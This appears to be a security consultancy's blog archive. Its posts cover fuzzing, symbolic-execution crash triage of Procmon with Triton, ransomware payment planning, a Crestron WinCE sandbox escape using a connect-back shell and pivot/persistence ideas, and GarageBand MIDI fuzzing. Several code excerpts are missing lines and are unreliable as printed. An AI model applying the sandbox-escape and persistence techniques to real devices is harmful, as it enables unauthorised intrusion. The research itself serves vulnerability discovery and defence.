-- Ping from    16937944: D�DAAAATT'%'aRt�'%9999'pRR����������T'%'LLLLLLLLLLLa%'nnnnnmnnnT'AA''��'A�'%'p%''A9999'pRR����������'pRR��R�� --
[2023-11-25T21:29:19Z ERROR libafl::executors::inprocess::unix_signal_handler] Crashed with SIGSEGV
[2023-11-25T21:29:19Z ERROR libafl::executors::inprocess::unix_signal_handler] Child crashed!


The goal of this workshop is to show the versatility of LibAFL and encourage its use. Hopefully these examples have sparked some ideas of how you can encorporate custom fuzzers against some of your targets. Let us know if you have any questions or spot any issues with our examples. Alternately, if you have an interesting target and want us to find bugs in it for you, please contact us.

Course Plug

Thanks again for reading! If you like this kind of stuff, you may be interested in our course "Practical Symbolic Execution for VR and RE" where you will learn to create your own symbolic execution harnesses for: reverse engineering, deobfuscation, vulnerability detection, exploit development, and more. The next public offering is in Febuary 2024 as part of ringzer0's BOOTSTRAP24. We are also available for private offerings on request.

More info here. https://ringzer0.training/trainings/practical-symbolic-execution.html

Symbolic Triage: Making the Best of a Good Situation

31 October 2022 at 18:40

Symbolic Execution can get a bad rap. Generic symbex tools have a hard time proving their worth when confronted with a sufficiently complex target. However, I have found symbolic execution can be very helpful in certain targeted situations. One of those situations is when triaging a large number of crashes coming out of a fuzzer, especially in cases where dealing with a complicated or opaque target. This is the "Good Situation" I have found myself in before, where my fuzzer handed me a large load of crashes that resisted normal minimization and de-duplication. By building a small symbolic debugger I managed a much faster turnaround time from fuzz-case to full understanding.

In this post I want to share my process for writing symbolic execution tooling for triaging crashes, and try to highlight tricks I use to make the tooling effective and flexible. The examples here all use the great Triton library for our symbolic execution and solving. The examples all use code hosted at: github.com/atredis-jordan/SymbolicTriagePost

(Oh BTW, we have a course!) Do you reverse engineer and symbolically execute in your workflows, or want to?

Are you using fuzzing today but want to find more opportunities to improve it and find deeper and more interesting bugs?

Can you jam with the console cowboys in cyberspace?

We've developed a 4-day course called "Practical Symbolic Execution for VR and RE" that's tailored towards these exact goals. It’s fun and practical, with lots of demos and labs to practice applying these concepts in creative ways. If that sounds interesting to you, there is more information at the bottom of this post. Hope to see you there!

We will be using a bunch of crashes in Procmon64.exe for our examples. Procmon's parsing of PML (Process Monitor Log) files is pretty easy to knock over, and we can quickly get lots of crashes out of a short fuzzing session. It is a large opaque binary with some non-determinism to the crashes, so useful tooling here will help us to speed up our reverse engineering efforts. Note that we weren't exhaustive in trying to find bugs in Procmon; so although these bugs we will talk about here don't appear super useful to an attacker, I won't be opening any untrusted PML files any time soon.

I gathered a bunch of crashes by making a few very small PML files and throwing Jackalope at the target. After a few hours we had 200ish odd crashes to play with. Many of the crashes were unstable, and only reproduced occasionally.

..\Jackalope\Release\fuzzer.exe -iterations_per_round 30 -minimize_samples false -crash_retry 0 -nthreads 32 -in - -resume -out .\out -t 5000 -file_extension PML -instrument_module procmon64.exe -- procmon64.exe /OpenLog @@ /Quiet /Runtime 1 /NoFilter /NoConnect

Fuzzing Procmon's PML paser with Jackalope

A Simple Debugger

With all this hyping up symbolic execution, our first step is to not use Symbolic Execution! Knowing when to turn to symbolic execution and when just to use emulation or a debugger is a good skill to have. In this case, we are going to write a very simple debugger using the Windows debugging API. This debugger can be used to re-run our crashing inputs, find out how stable they are, see if they all happen in the main thread, gather stack traces, etc.

Also, having a programmatic debugger will be very useful when we start symbolically executing. We will talk about that here in a second, first let's get our debugger off the ground.

Quick aside. All my code examples here are in python, because I like being able to pop into IPython in my debuggers. I defined a bunch of ctypes structures in the win_types.py file. I recommend having some programmatic way to to generate the types you need. Look into PDBRipper or cvdump as a good place to start.

Okay, so first we want a debugger that can run the process until it crashes and collect the exception information. The basic premise is we start a process as debugged (our connect_debugger function in triage.py), and then wait on it until we get an unhandled exception. Like so:

    handle, main_tid = connect_debugger(cmd)

    log("process", 3, f": -- ")

    event = dbg_wait(handle, None)
    code = event.dwDebugEventCode

        log("crash", 1, f" Closed with no crash")
    elif code == EXCEPTION_DEBUG_EVENT:
        # exception to investigate
        log("crash", 1, f" crashed:")
        er = event.u.Exception.ExceptionRecord
        log("crash", 1, exceptionstr(handle, er, event.dwThreadId))

        log("process", 1, f" hit unexpected Debug Event ")


A piece of triage.py's handle_case, running a single test case

Running the above code to get the exception information from a crash

Many of the crashes will not happen every time due to some non-determinism. Running through all our test cases multiple times in our debugger, we can build a picture of which crashes are the most stable, if they stay in the main thread, and what kind of exception is happening.

.\crsh\access_violation_0000xxxxxxxxx008_00000xxxxxxxx5AA_1.PML -- 100% (18) -- main thread
         EXCEPTION_ACCESS_VIOLATION(0xc0000005) @ 0x520 read at 0x5aa
         EXCEPTION_STACK_BUFFER_OVERRUN(0xc0000409) @ 0x83c
.\crsh\access_violation_0000xxxxxxxxx008_00000xxxxxxxx5AA_2.PML -- 100% (34) -- main thread
         EXCEPTION_ACCESS_VIOLATION(0xc0000005) @ 0x520 read at 0x5aa
.\crsh\access_violation_0000xxxxxxxxx063_00000xxxxxxxx3ED_1.PML -- 100% (34) -- main thread
         EXCEPTION_ACCESS_VIOLATION(0xc0000005) @ 0x520 read at 0x3ed
.\crsh\access_violation_0000xxxxxxxxx3D4_00000xxxxxxxxED1_2.PML -- 52% (23) -- main thread
         EXCEPTION_ACCESS_VIOLATION(0xc0000005) @ 0x87a read at 0xed1
.\crsh\access_violation_0000xxxxxxxxx234_00000xxxxxxxxED4_3.PML -- 45% (22) -- main thread
         EXCEPTION_ACCESS_VIOLATION(0xc0000005) @ 0x649 read at 0xa2
         EXCEPTION_ACCESS_VIOLATION(0xc0000005) @ 0x87a read at 0xed4
.\crsh\access_violation_0000xxxxxxxxx3CA_00000xxxxxxxxED1_1.PML -- 45% (22) -- main thread
         EXCEPTION_ACCESS_VIOLATION(0xc0000005) @ 0x87a read at 0xed1
.\crsh\access_violation_0000xxxxxxxxx5EC_00000xxxxxxxx0A2_1.PML -- 45% (22) -- main thread
         EXCEPTION_ACCESS_VIOLATION(0xc0000005) @ 0x87a read at 0xed4
.\crsh\access_violation_0000xxxxxxxxx5EF_00000xxxxxxxxF27_1.PML -- 45% (22) -- main thread
         EXCEPTION_ACCESS_VIOLATION(0xc0000005) @ 0x649 read at 0xa2
         EXCEPTION_ACCESS_VIOLATION(0xc0000005) @ 0x87a read at 0xecb
.\crsh\access_violation_0000xxxxxxxxxB46_00000xxxxxxxxFF4_1.PML -- 44% (18) -- main thread
         EXCEPTION_ACCESS_VIOLATION(0xc0000005) @ 0x87a read at 0xed4
         EXCEPTION_ACCESS_VIOLATION(0xc0000005) @ 0x649 read at 0xa2
.\crsh\access_violation_0000xxxxxxxxx25A_00000xxxxxxxxED4_1.PML -- 38% (21) -- main thread
         EXCEPTION_ACCESS_VIOLATION(0xc0000005) @ 0x649 read at 0xa2
         EXCEPTION_ACCESS_VIOLATION(0xc0000005) @ 0x87a read at 0xecb
         EXCEPTION_ACCESS_VIOLATION(0xc0000005) @ 0x19d read at 0x184

Gathered information from multiple runs

Let me have another quick aside. Windows exceptions are nice because they can contain extra information. The exception record tells us if an access violation is a read or a write, as well as the pointer that lead to the fault. On Linux, it can be hard to get that information programmatically, as a SEGFAULT is just a SEGFAULT. Here we can use our symbolic execution engine to lift only the faulting instruction. The engine will provide us the missing information on what loads or stores happened, letting us differentiate between a boring NULL read and an exciting write past the end of a page.

Getting our Symbolic Execution Running, and a Few Tricks

We now have a simple debugger working using the Windows debugger API (or ptrace or whatever). Now we can add our symbolic engine into the mix. The game plan is to use our debugger to run the target until our input is in memory somewhere. Then we will mark the input as symbolic and trace through the rest of the instructions in our symbolic engine.

Marking input as “symbolic” here means we are telling our engine that these values are to be tracked as variables, instead of just numbers. This will let the expressions we see all be in terms of our input variables, like “rax: (add INPUT_12 0x12)” instead of just “rax: 0x53”. A better term would be “concolic” (concrete-symbolic) because we are still using the actual value of these input bytes, just adding the symbolic information on top of them. I just use the term symbolic in this post, though.

Our debugger will tell us when we reach the exception. From there we should be able to inspect the state at the crash in terms of our symbolic input. For an access violation we hope to see that the pointer dereferenced is symbolically "(0xwhatever + INPUT_3c)" or some other symbolic expression, showing us what in our input caused the crash.

This information is useful for root causing the crash (we will see a couple cool tricks for working with this information in the next section). We gather this symbolic info so we can take the constraints that kept us on the crashing path, along with our own constraints, and send those to a solver. Using the solver we can ask "What input would make this pointer be X instead?" This lets us quickly identify a Write-What-Where from a Read8-AroundHere, or a Write-That-ThereGiveOrTake100. We can break our symbolic debugger at any point in a trace and use the solver to answer our questions.

Stopping at a breakpoint, and seeing what input would make RBX equal 0x12340000 here

Note: I should point out that it isn't strictly necessary to use a debugger at all. We could just load procmon64.exe and it's libraries into our symbolic execution engine, and then emulate the instructions without a debugger's help. If you see the great examples in the Triton repo, you will notice that none of them step along with a debugger. I like using a symbolic execution engine alongside a debugger for a couple of reasons. I’ll highlight a few of those reasons in the following paragraphs.

The main reason is probably to avoid gaslighting myself. With a debugger or a concrete execution trace I have a ground truth I can follow along with. Without that it is easy to make a mistake when setting up our execution environment and not realize until much later. Things like improperly loading libraries, handling relocations, or setting up the TEB and PEB on windows. By using a debugger, we can just setup our execution environment by pulling in chunks of memory from the actual process. We can also load the memory on demand, so we can save time on very large processes. In our example we load the memory lazily with Triton's GET/SET_CONCRETE_MEMORY_VALUE callbacks.

def tri_init(handle, onlyonsym=False, memarray=False):
    # do the base initialization of a TritonContext

    ctx = TritonContext(ARCH.X86_64)
    ctx.setMode(MODE.ONLY_ON_SYMBOLIZED, onlyonsym)
    if memarray:
        ctx.setMode(MODE.MEMORY_ARRAY, True)
        ctx.setMode(MODE.ALIGNED_MEMORY, True)
    ctx.setMode(MODE.AST_OPTIMIZATIONS, True)

    # set lazy memory loading
    def getmemcb(ctx, ma):
        addr = ma.getAddress()
        sz = ma.getSize()
        # will only load pages that have not been previously loaded
        tri_load_dbg_mem(ctx, handle, addr, sz, False)

    def setmemcb(ctx, ma, val):
        addr = ma.getAddress()
        sz = ma.getSize()
        # will only load pages that have not been previously loaded
        tri_load_dbg_mem(ctx, handle, addr, sz, True)

    ctx.addCallback(CALLBACK.GET_CONCRETE_MEMORY_VALUE, getmemcb)
    ctx.addCallback(CALLBACK.SET_CONCRETE_MEMORY_VALUE, setmemcb)

    return ctx

Setting up Triton in triage.py

The debugger also lets us handle instructions that are unknown to our symbolic execution engine. For example, Triton does not have a definition for the 'rdrand' instruction. By single stepping alongside our debugger, we can simply fix up any changed registers when we encounter unknown instructions. This could lead to a loss of symbolic information if the instruction is doing something with our symbolic inputs, but for the most part we can get away with just ignoring these instructions.

Lastly, using our debugger gives us another really nice benefit; we can just skip over whole swaths of irrelevant code! We have to be very careful with what we mark as irrelevant, because getting it wrong can mean we lose a bunch of symbolic information. With procmon, I marked most of the drawing code as irrelevant. When hitting one of these imports from user32 or gdi32, we place a breakpoint and let the debugger step over those calls, then resume single stepping with Triton. This saves a ton of time, as symbolic execution is orders of magnitude slower than actual execution. Any irrelevant code we can step over can make a huge difference.

Without a debugger we can still do this, but it usually involves writing hooks that will handle any important return values or side effects from those calls, instead of just bypassing them with our debugger. Building profiling into our tooling can help us identify those areas of concern, and adjust our tooling to gain back some of that speed.

    # skip drawing code
    if skip_imports:
        impfuncs = dbg_get_imports_from(handle, base, ["user32.dll", "gdi32.dll", "comdlg32.dll", "comctl32.dll"])
        for name in impfuncs:
            addr = impfuncs[name]

            # don't skip a few user32 ones
            skip = True
            for ds in ["PostMessage", "DefWindowProc", "PostQuitMessage", "GetMessagePos", "PeekMessage", "DispatchMessage", "GetMessage", "TranslateMessage", "SendMessage", "CallWindowProc", "CallNextHook"]:
                if ds.lower() in name.lower():
                    skip = False

            if skip:
                hooks[addr] = (skipfunc_hook, name)

Skipping unneeded imports in triage.py

For our target, skipping imports wasn't enough. We were still spending lots of time in loops inside the procmon binary. A quick look confirmed that these were a statically included memset and memcpy. We can't just skip over memcpy because we will lose the symbolic information being copied. So for these two, we wrote a hook that would handle the operation symbolically in our python, without having to emulate each instruction. We made sure that copied bytes got a copy of the symbolic expression in the source data.

    for i in range(size):
        sa = MemoryAccess(src + i, 1)
        da = MemoryAccess(dst + i, 1)
        cell = ctx.getMemoryAst(sa)
        expr = ctx.newSymbolicExpression(cell, "memcpy byte")
        ctx.assignSymbolicExpressionToMemory(expr, da)

Transfering symbolic information in our memcpy hook

These kind of hooks not only save us time, but they are a great opportunity to check the symbolic arguments going into the memcpy or memset. Even if the current trace is not going to crash inside of the memcpy, we have the ability to look at those symbolic arguments and ask "Could this memcpy reach unmapped memory?" or "Could the size argument be unreasonably large?". This can help us find other vulnerabilities, or other expressions of the issues we are already tracing. Below is a small check that tries to see if the end of a memcpy's destination could be some large amount away.

        astctx = ctx.getAstContext()
        cond = ctx.getPathPredicate()
        # dst + size
        dstendast = ctx.getRegisterAst(ctx.registers.rcx) + ctx.getRegisterAst(ctx.registers.r8)
        # concrete value of the dst + size
        dstendcon = dst + size
        testpast = 0x414141
        cond = astctx.land([cond, (dstendcon + testpast) <= dstendast])

        log("hook", 5, "Trying to solve for a big memcpy")
        model, status, _ = ctx.getModel(cond, True)
        if status == SOLVER_STATE.SAT:
            # can go that far
            # this may not be the cause of our crash though, so let's just report it, not raise it
            log("crash", 2, "Symbolic memcpy could go really far!")

A simple check in our memcpy hook from triage.py

The tradeoff of these checks is that invoking the solver often can add to our runtime, and you probably don't want them enabled all the time.

At this point we have most of what we need to run through our crashing cases and start de-duplicating and root-causing. However, some of our access violations were still saying that the bad dereference did not depend on our input. This didn't make sense to me, so I suspected we were losing symbolic information along the way somehow. Sometimes this can happen due to concretization of pointers, so turning on Triton's new MEMORY_ARRAY mode can help us recover that information (at the cost of a lot of speed).

In this case, however, I had my tooling print out all the imported functions being called along the trace. I wanted to see if any of the system calls on the path were causing a loss of symbolic information. Or if there was a call that re-introduced the input without it being symbolized. I found that there was another second call to MapViewOfFile that was remapping our input file into memory in a different location. With a hook added to symbolize the remapped input, all our crashes were now reporting their symbolic relation to the input correctly!

Our tooling showing an AST for one of the bad dereferences

Using our Symbolic Debugger

Cool! Now we have symbolic information for our crashes. What do we do with it?

Well first, we can quickly group our crashes by what input they depend on. This is quite helpful; even though some issues can lead to crashes in multiple locations, we can still group them together by what exact input is lacking bounds checks. This can help us understand a bug better, and also see different ways the bug can interact with the system.

By grouping our crashes, it looked like our 200ish crashes boil down to four distinct groups: three controlled pointers being read from and one call to __fastfail.

One neat tool Triton gives us is backward slicing! Because Triton can keep a reference of the associated instruction when building it's symbolic expressions, we can generate a instruction trace that only contains the instructions relevant to our final expression. I used this to cut out most code along the trace as irrelevant, and be able to walk just the pieces of code between the input and the crash that were relevant. Below we gather relevant instructions that created the bad pointer that was dereferenced in one of our crashes.

def backslice_expr(ctx, symbexp, print_expr=True):
    # sort by refId to put things temporal
    # to get a symbolic expression from a load access, do something like:
    # symbexp = inst.getLoadAccess()[0][0].getLeaAst().getSymbolicExpression()
    items = sorted(ctx.sliceExpressions(symbexp).items(), key=lambda x: x[0])
    for _, expr in items:
        if print_expr:
        da = expr.getDisassembly()
        if len(da) > 0:
            print("\t" if print_expr else "", da)

A back-slicing helper in triage.py-

Back-slicing with the above code

Being able to drop into the IPython REPL at any point of the trace and see the program state in terms of my input is very helpful during my RE process.

For the call to __fastfail (kinda like an abort for Windows), we don't have a bad dereference to back-slice here, instead we have the path constraints our engine gathered. These constraints are grabbed any time the engine sees that we could symbolically go either way at a junction. To stay tied to our concrete path, the engine notes down the condition required for our path. For example: if we take a jne branch after having compared the INPUT_5 byte against 0, the engine will add a path constraint saying "If you want to stay on the path we took, make sure INPUT_5 is not 0", or "(not (= INPUT_5 (_ bv0 8))" in AST-speak.

These path constraints are super useful. We can use them to generate other inputs that would go down unexplored paths. There are lots of nice symbolic execution tools that use this to help a fuzzer by generating interesting new inputs. (SymCC, KLEE, Driller, to name three)

In our case, we can inspect them to find out why we ended up at the __fastfail. By just looking at the most recent path constraint, we can see where our path forked off most recently due to our input.

The most recent path constraint leading to the __fastfail

The disassembly around the most recent path constraint

The path constraint tells us that the conditional jump at 0x7FF7A3F43517 in the above disassembly is where our path last forked due to one of our input values. When we follow the trace after this fork, we can see that it always leads directly to our fatal condition. To get more information on why the compare before the fork failed, I dropped into an IPython shell for us at that junction. Our tooling makes it easy to determine the control we have over the pointer in RCX being dereferenced before the branch. That makes this another crash due to a controlled pointer read.

Showing the AST for the dereferenced register before the branch

Where To Go From Here

So from here we have a pretty good understanding of why these issues exist in procmon64.exe. Digging in a little deeper into the crashes shows that they are probably not useful for crafting a malicious PML file. If I wanted to keep going down this road, my next steps would include:

  • Generating interesting test cases for our fuzzer based off the known unchecked areas in the input

  • Identifying juicy looking functions in our exploit path. With our tooling we can gather information on what control we have in those functions. With this information we can start to path explore or generate fuzz cases that follow our intuition about what areas look interesting.

  • Patch out the uninteresting crash locations, and let our fuzzer find better paths without being stopped by the low-hanging fruit.

  • Generate a really small crashing input for fun.

The official policy of Microsoft is "All Sysinternals tools are offered 'as is' with no official Microsoft support." We were unable to find a suitable place to report these issues. If anyone with ties to the Sysinternals Suite wants more information, please contact us.

Hope this Helped! Come Take the Course!

I hope this post helped you see useful ways in which creative symbolic execution tooling could help their workflow! If anyone has questions or wants to talk about it, you can message me @jordan9001 or at [email protected].

If you got all the way to the end of this post, you would probably like our course!

"Practical Symbolic Execution for VR and RE" is hands-on. I had a lot of fun making it, and we look at a variety of ways to apply these concepts. Students spend time becoming comfortable with a few frameworks, deobfuscating binaries, detecting time-of-check time-of-use bugs, and other interesting stuff.

You can give us your information below, and we will email you when we next offer a public course. (No spam or anything else, I promise.)

If you have a group that would be interested in receiving this kind of training privately, feel free to contact us about that as well! I’d like to see you in a class sometime!


Subscribe to Atredis Training News

Sign up with your email address to receive news and updates on when the next public Atredis Training will be available.

We respect your privacy, and will not use your contact information for anything other than news about Atredis Trainings.

Thank you!

Part 1: Ransomware – To Pay or Not to Pay

22 August 2022 at 17:50

The consultants here at Atredis Partners have delivered a lot of Incident Response table-top exercises over the years and personally, I learn something new nearly every time. Sure, the basic premise stays the same, but every client / organization is different, not only because of the idiosyncrasies of their industry verticals and unique business requirements, but also because their employees bring their own personal experiences and perspectives to the table.

Given the prevalence of ransomware attacks over the last few years, with what seems to be no slowing down, many clients are reaching out to us seeking focused ransomware incident response table-top exercises to better understand their ability to detect, respond, and manage a ransomware incident. In this blog, the first of three focused on ransomware, we will address one of the key questions that many organizations are not thinking about, or at least maybe not considering deeply enough. 

While some organizations realize the very real threat that ransomware attacks pose to their operations and are asking good questions to help understand their preparedness, we have found that the questions being asked are usually falling short of the questions that really need to be asked…the challenging questions and maybe the questions people just are not thinking about. The typical questions most organizations want to be addressed are:

  • What are we doing to prevent or limit our exposure to ransomware attacks?

  • Can we detect a ransomware attack?

  • How quickly could we respond to a ransomware attack?

  • How would we mitigate an attack?

  • Can we recover from an attack?

Occasionally, this question comes up:

  • Would we pay an attacker if we determined that we could not contain or recover from an attack that is having a major impact on our business operations?

That last question regarding paying an attacker is one that is not being asked enough because it is a complex question to answer. But even with that, we are only scratching the surface of what businesses should be asking as it relates to a ransomware attack and the potential decision about making a ransom payment to attackers.

A common line of thinking (even recommended from some sources (including the FBI – see link) is that “an organization should never pay the ransom” because that only elicits more criminal behavior, and is somehow seen as taking the easy way out, making it worse for others down the line.

That sounds good in an academic sense; however, the real world is much different, and who are we to advise a CEO of any company that is facing a potentially financially devastating ransomware attack scenario due to an ongoing outage situation that the ransom should not be paid. Imagine scenarios where an organization is not able to provide critical services such as emergency patient care because of a ransomware attack. Should that organization be faced with the decision of patient harm or lives lost due to a hard stance on never paying the ransom?  Like much of what we provide guidance on as Risk and Advisory Consultants, making this type of decision is a risk-based one that only an organization’s leadership can make.

Our job is to help make sure it is a well-informed decision made by the right people within the organization based on the business mission and risk tolerance, and not a decision made by public opinion.

Even as some organizations are starting to consider how to answer the tough questions about paying (or not paying) a ransom and what leads to that decision, it still may not be enough to be fully prepared.

Let’s say that you have talked with your leadership about key decision factors and as to whether your organization would pay attackers in the event of a ransomware incident. Your leadership has decided that if certain criteria were met, they would, in fact, make the difficult decision to pay attackers a ransom to restore business operations impacted by the attack. You have documented processes, procedures, and workflow Visios to drive that decision.

This is a great start, but it is only the beginning. Once an organization has made the decision to pay a ransom, there are many other actions that need to be executed after that decision that must be considered well in advance.

The first thing the business needs to consider is – if it is going to pay a ransom, how is the ransom actually paid? You might think this is easy… just pay the attackers some Bitcoin, right? Well, probably yes, but it’s not that simple. Making a Bitcoin payment, or any cryptocurrency payment is not as easy as buying your favorite things from Amazon. Although many attackers request Bitcoin as a ransom payment, some may ask for other types of cryptocurrencies.

Another key question to consider is: does your organization want to make the payment on its own, or will it want to leverage an outside firm that specializes in this type of service? We typically advise utilizing an experienced outside firm for these reasons:

  • The organization’s cyber liability insurance may require it.

  • Many of the above considerations are managed by the firm’s experts.

  • Additionally, the expertise of an outside firm to handle things like negotiations and data recovery is invaluable.

  • There are plenty of reputable firms that specialize in helping organizations navigate critical ransomware payment activities, and they are generally much better suited to manage these activities on your behalf. ­­­

While we recommend leveraging an outside firm, there may be cases when managing the payment in-house is the right option for your organization. If the decision is made to try and make the payment without assistance from outside experts, then there are other questions that need to be considered well ahead of time, so all necessary preparations have been made:

1.     How does an organization obtain cryptocurrency?

a. You will need to establish a crypto wallet through an established service. There are several to choose from and many considerations needed to select the one that will meet your needs.

b. A critical component to keep in mind is that once you establish a crypto wallet, it will take 3-5 days to exchange your traditional currency into cryptocurrency.

c.  Other less desirable options include using cryptocurrency ATMs, but due to certain limitations, this will likely not meet your needs in the scenarios we are evaluating here.

2.     How much cryptocurrency is typically needed? 

a. This will be different based on risk tolerance and will require research to determine the right amount to maintain in a crypto wallet.

b. Remember that any cryptocurrency obtained will be subject to the ebbs and flows of the market, so you are essentially gambling that your funds will remain and hopefully not disappear.

3.     How does an organization manage the wallet/cryptocurrency?

a. Not to be forgotten here is considering who within the organization is going to manage the wallet and cryptocurrency. This could be a significant amount of money.

b. It needs to be managed responsibly, and likely under the control of more than one individual.

4.     Should an organization negotiate with the attackers before making a ransom payment?

a.  This may or may not be feasible, but in either case, negotiation planning, and terms should be outlined well in advance.

b. The organization would need to research the legalities and determine how and when to notify the FBI, etc.  

5.     How does an organization execute a ransom payment? 

a. This is not as simple as it seems. There are many things to consider at the tactical level to execute a payment.

i. What accounts or email addresses do we use to make the payment transaction?

ii. Which device do we make the payment transaction from?

b. Should that device be internal or external to our network?

i. Do we need to install and/or use a TOR browser (or similar) for making the payment?

6.     Once an organization makes the payment, how do they ensure that decryption tools are provided in return? 

a. Once payment is made, there is still work to be done to recover.

b. Once the decryption keys/tools are provided, the organization will need to recover systems, and consider all the caveats that go along with recovery.

At a minimum, organizations should at least start asking these questions and thoughtfully making decisions well in advance of an actual ransomware attack.

Anyone who has managed a challenging incident response scenario of any kind knows that the time to make critical decisions such as these is not during a stressful real time incident. In our next blog in this series, we’ll dive into what it means to be “ready” for a Ransomware event….and not just “ready”, but ”REALLY ready”.

This blog post was written by Bill Carver with support from Kiston Finney and Taryn Yager, then edited for the web by Lacey Kasten at Atredis Partners.

This post is Part 1 of a series crafted by the Risk Advisory consultants at Atredis Partners. As the other parts are published, we will update this post with relevant links to the other parts of the series.

Researching Crestron WinCE Devices

2 July 2022 at 13:33

The setup

In the past, I’ve come across Crestron devices on corporate networks. They are enterprise appliances for handling and automating audio/visual data and peripherals. Think conferencing or display automation. With default or weak credentials, the appliances can be accessed over several ports including FTP, Telnet, SSH, and others.

I acquired several current-gen Crestron 3-series devices through an auction at my local university. They were upgrading their gear and getting rid of what they had that was out of warranty, even if it was still perfectly good.

I soon realized, though, that they are little more than sophisticated input switchers if you also don’t have Crestron Toolbox. This limitation in the enterprise-grade Crestron devices is a common problem. I started searching on how to actually use the devices after getting them home and quickly found Reddit and other posts opining the same issue. The devices were expensive manual switchers without Crestron Toolbox.

Crestron Toolbox and its ancillary Simpl framework and IDE enable Crestron administrators to develop applications to automate not only Crestron devices, but audio/visual devices by other manufacturers as well. Crestron Toolbox and Simpl installers are very hard to get a hold of if you are not a Crestron vendor, and it is held closely with an NDA.

The Simpl IDE created by Crestron allows an administrator to develop applications visually without code for particular Crestron devices. If you are feeling brave though, you can also begin writing modules of re-usable functions in a language called Simpl+. Simpl+ gets converted into C# and compiled into a sandbox. This sandbox is effectively a set of methods exposed to Simpl+ that Crestron controls fully for file system or other access.

Simpl applications are signed using a special Crestron certificate. This prevents an arbitrary application from being loaded onto the devices. The code must have been compiled by the Simpl IDE in order to be run on the devices.

The research

By default, command prompt access to Crestron devices is sandboxed. Even as an administrator, you do not have full file system access. My 3-Series devices were running Windows CE 7.0 with .NET Compact Framework 3.5. With authentication disabled, the default credentials are crestron:<blank>. I’m not much of a hardware person so I made no attempt to open up the devices. I wanted to do purely remote research. I started with nmap.

After logging into Telnet and SSH and looking around the exposed file system (while also navigating Crestron PDFs), I decided to focus on the Simpl applications. Simpl applications have a lpz extension and are just zip files.

Attempting to replace specific executables within the lpz file didn’t work, but I’m not sure this is still a dead end. I attempted this testing before I fully understood the CPU architecture and executable requirements of Windows CE. It may still be possible to make a quick swap and achieve a similar sandbox breakout. In the end, the code you compile from Simpl ends up as a signed .NET DLL in the lpz application, loaded by a signed harness application.

The sandbox is enforced at compile-time, not while running on the device. This may seem counter-intuitive, but it effectively means the functions exposed to Simpl+ at compile-time are controlled by Crestron, not the .NET Framework. Listing directories in Simpl will show you the directories Crestron wants to show you, not what is actually there. In order to sign my own C# code, I started investigating how Simpl went from Simpl+ code -> C# -> compiled DLL -> signed DLL.

During compilation, Crestron Toolbox creates a working directory which it outputs the new C# before compiling and signing. I used ProcMon to monitor what processes were spawned during the compilation process and csc.exe is called directly on the C# code in the working directory. I ended up writing a small wrapper for csc.exe that would copy my C# code (altered from a copy of the real C# generated) over the generated C# before passing the args along to the real csc.exe to compile the tampered-with code. It worked and I had a signed lpz file with my own C# code that would run outside of the intended application sandbox.

There may be more issues with signing in general, but I stopped looking once I could sign my own code outside of the sandbox.

The results

There is no real usable command shell on these devices outside of the sandbox shell you log in to. I had arbitrary code execution, but writing new code and deploying a new application is more than tedious when you want to change something slightly. Unfortunately, there don’t seem to be any cookie-cutter WinCE Metasploit payloads.

I ended up writing a small connect-back shell with basic functionality. This shell is uploaded as a signed application in Github, along with the source code. You can load this application without Crestron Toolbox, you only need remote authenticated access. You can see the difference immediately in the exposed file system to the connect-back shell vs accessing over SSH or telnet.

The potential

Many Crestron devices of this nature have two interfaces, one for LAN and one for Control. If configured with both a LAN and Control port, they could make excellent pivot points. These are also Windows machines, but aren’t running any host-based IDS or AV. They would be an great location for persistence.

Veni, MIDI, Vici — Conquering CVE-2022-22657 and CVE-2022-22664

29 March 2022 at 14:00

Recently, Apple pushed two security fixes for issues in the way GarageBand and Logic Pro X parsed MIDI (musical instrument digital interface) data. GarageBand is free and is available in the default OS X image. Logic Pro X can be purchased in the App Store:


Available for: macOS Big Sur 11.5 and later

Impact: Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution

Description: A memory initialization issue was addressed with improved memory handling.

CVE-2022-22657: Brandon Perry of Atredis Partners


Available for: macOS Big Sur 11.5 and later

Impact: Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution

Description: An out-of-bounds read was addressed with improved bounds checking.

CVE-2022-22664: Brandon Perry of Atredis Partners


I do a lot with music and audio/visual-related work outside of my work at Atredis, but this is the first time my hobby in recording and music directly influenced my bug hunting.

While looking into MIDI support on Linux, I noticed the application Timidity was often used to play MIDI files. Unfortunately, Timidity has been unsupported for a very long time and no official source code repository seemed to exist. However, while playing with it, I got the idea to fuzz Timidity, but not because I wanted to look for any bugs in Timidity itself.

Setting up Timidity to fuzz was simple with AFL (American Fuzzy Lop). Firstly, compile with instrumentation, and you are good to go.

Fuzzing Timidity with AFL

After a few days, I wasn’t finding any more new paths. In the end, I had 100,000 weird MIDI files.


GarageBand comes installed by default on the latest Macs and is primarily how you play MIDIs on OS X. There are also iPad apps for both GarageBand and Logic Pro X. On OS X, by double-clicking on a MIDI, it will open in GarageBand by default. To me, this implied that I could pass a MIDI to the GarageBand binary as an argument on the command-line.

cd /Applications/GarageBand.app/Content/MacOS/
./GarageBand ~/test.midi

Sure enough, this opened GarageBand and the MIDI. To start running GarageBand against all of my MIDIs, I hacked up this quick bash script.

for i in `ls /Users/bperry/midis/` 
    ./GarageBand /Users/bperry/midis/$i& 
    sleep 15 
    killall -9 GarageBand 

Luckily, GarageBand supports logging it’s crash reports with the OS X crash handler, so you get nice crash reports like this.

Time Awake Since Boot: 550000 seconds

System Integrity Protection: enabled

Crashed Thread:        0

Exception Type:        EXC_BAD_ACCESS (SIGSEGV)
Exception Codes:       KERN_INVALID_ADDRESS at 0x0000000000000000
Exception Note:        EXC_CORPSE_NOTIFY

Termination Signal:    Segmentation fault: 11
Termination Reason:    Namespace SIGNAL, Code 0xb
Terminating Process:   exc handler [86400]

VM Regions Near 0:
    __TEXT                      1062db000-1082af000    [ 31.8M] r-x/r-x SM=COW  /Applications/Logic Pro X.app/Contents/MacOS/Logic Pro X

Application Specific Information:
Squire | 9822ba165c8200ad3eea20c1d3f8a51ff3c7a5c38397f17d396e73f464c81ef7 | 285921cb956a827f4eba8133900ad6876a990855 | 2021-11-05_15:18:01

Thread 0 Crashed:
0   id:000053,src:000000,op:havoc,rep:8,+cov.mid	0x0000000106e98f6d 0x1062db000 + 12312429
1   id:000053,src:000000,op:havoc,rep:8,+cov.mid	0x0000000106e9a988 0x1062db000 + 12319112
2   id:000053,src:000000,op:havoc,rep:8,+cov.mid	0x00000001076757bc 0x1062db000 + 20555708
3   com.apple.AppKit              	0x00007fff23307f18 -[NSDocumentController(NSDeprecated) openDocumentWithContentsOfURL:display:error:] + 808
